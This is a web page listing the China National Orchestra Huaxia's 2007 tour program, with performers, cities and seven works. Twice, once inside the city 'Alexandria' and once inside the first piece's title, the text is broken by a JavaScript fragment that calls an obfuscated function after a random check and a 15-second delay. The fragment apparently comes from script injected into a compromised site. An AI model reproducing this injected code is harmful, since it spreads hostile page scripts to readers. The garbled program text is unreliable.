2007 – I – China National Orchestra Huaxia

2007 – I – China National Orchestra Huaxia

2007, Year Of The Pig

China National Orchestra Huaxia/Kuan Naichung (Guan Naizhong)

Huqin: Song Fei, Cao Dawei – guzheng: Qiu Ji – dizi: Zhang Weiliang – Chinese Percussion: Wang Yidong

Lucerne – Milano – Vienna – Luxemburg – Nuremberg – Cairo – Alexandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andria

See Program II with the China Traditional Orchestra Zhejiang! >>

Check the Gallery! >>


Program I

1. The New Century in the Dragon’s Year: The Sun , Percussion andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and Orchestra, Composed by: Kuan Nai-chung, Soloists: Wang Yidong, Zhang Jingli

2. Lang Taosha, Chaozhou Traditional, Arranged by: Gao Weijie, guzheng: Qiu Ji

3. The Soaring Dragon, Composed by: Zhang Ziqian

4. Dreams in Peking, Composed by: Kuan Nai-chung, erhu: Song Fei

5. Legend of a Heroine – Mu Guiying, Composed by: Yang Muyun, Zhang Kongfan, jinghu: Cao Dawei

6. Weeping on Flowers, Composed by: Zhang Weiliang, Arranged by: Yang Qing, dizi: Zhang Weiliang

7. North-western Suite (Op.3 & Op.4), Composed by: Tan Dun